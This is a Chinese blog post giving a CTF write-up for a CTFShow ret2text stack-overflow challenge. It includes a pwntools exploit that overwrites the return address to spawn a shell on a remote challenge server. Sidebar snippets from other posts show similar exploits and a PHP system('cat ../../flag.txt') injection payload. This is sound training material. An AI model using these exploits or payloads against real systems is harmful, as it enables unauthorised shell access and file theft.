Pwn_CTFShow_02

最新推荐文章于 2024-05-18 17:17:48 发布
最新推荐文章于 2024-05-18 17:17:48 发布
阅读量614 收藏
点赞数
分类专栏: CTF Pwn 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/109035221
版权
Pwn 同时被 2 个专栏收录
16 篇文章 2 订阅
订阅专栏
CTF
5 篇文章 0 订阅
订阅专栏

Pwn_CTFShow_01

01栈溢出之ret2text

很简单的一个栈溢出
直接IDA分析
在这里插入图片描述
从main函数跟进到welcome函数
get() 很明显的溢出
在这里插入图片描述

payload = 'a'*(0x80+8)

因为是64位的,所以后面要加上8
Shift+F12
在这里插入图片描述
发现/bin/sh 果然够简单的。。。
双击进去
在这里插入图片描述
再双击

在这里插入图片描述
找到地址
exp:

from pwn import *

p=remote('111.231.70.44',28072)

payload='a'*(0x80+8) + p64(0x40063B)

p.sendline(payload)

p.interactive()
_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3457
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
Pwn_CTFShow_01
Trick的博客
11-08 793
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
ctfshow - Reverse
最新发布
qq_62262904的博客
05-18 607
这个地方建议用ida的动态调试去看,提示中给出值为4位,那么就假设给的flag是flag{0000},调出来发现,i=6时,v16的值是000000000000E560,v17[6]=v5,那么v16+v5结果等于0xFFFF,退出循环,然后判断成功,所以v5=0xFFFF-v16=0x1A9F,提示也要求最小值,成功。这与一次性填充类似,只是使用生成的伪随机位而不是准备好的流。先写个脚本,异或回来,这里异或的是0x1f,再异或一次,就可以得到原始的Str,也就是输入的内容,定死了,就是。
ctfshow | 单身杯dsb | pwn | ctfshow_OA
Dem1的博客
05-22 351
#create user&password -> login -> validate psn session -> from pwn import * p = remote("pwn.challenge.ctf.show",28156) #-----main -> menu #-----from main #-----create_new_user p.sendline('1') p.recvuntil('username :') p.sendline('pwn')#
CTFSHOW PWN02
m0_74093152的博客
03-22 890
CTFSHOWPWN02
ctfshow_pwn03
Dem1的博客
05-19 3637
https://www.bilibili.com/video/av885494681 #查看libc地址 lbb 文件名
CTF_ctfshow_签退
weixin_54227009的博客
05-17 373
直接参数覆盖 ?S=a=system('cat ../../flag.txt'); 或?S=a;system('cat ../../flag.txt');
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9463
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 5929
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 3325
本文主要详解CTFshow中pwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
checksec
Trick的博客
11-10 2766
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
not_the_same_3dsctf_2016
Trick的博客
11-26 811
IDA main函数发现栈溢出 长度2d 在函数列表找到 get_secret()函数 知道flag被存在了bss段上的fl4g中 一开始的想法是用main函数的printf把flag输出,但发现好像行不通 后来在列表中找到了write函数 函数地址可以用elf.sym[‘write’]表示,也可以直接用test段的地址,都一样 exp: from pwn import * context.log_level='debug' p = remote('node3.buuoj.cn',29167) e
Pwn_BUUCTF
Trick的博客
11-08 677
Pwn_BUUCTF1.test_your_nc2.ripIDA查看写脚本 1.test_your_nc 直接 nc cat flag 直接出flag,白给题 2.rip IDA查看 拉文件进 IDA 看main: 直接进 gets 找 s 发现偏移:0xF + 8 写exp paylode=a*(0xF+8) 回到 IDA 看到 “/bin/sh” 的地址 :40118A 写脚本 完整exp from pwn import * p=remote('node3.buuoj
ctfshow pwn02
09-22
ctfshow pwn02是一个鹏城实验室的pwn题,它涉及到libc-2.31.so下off-by-null的漏洞利用。该题目是在Linux平台下进行的,其中还考查了地址空间分布随机化(ASLR)的机制。具体来说,该题目是一个堆漏洞利用题目,需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值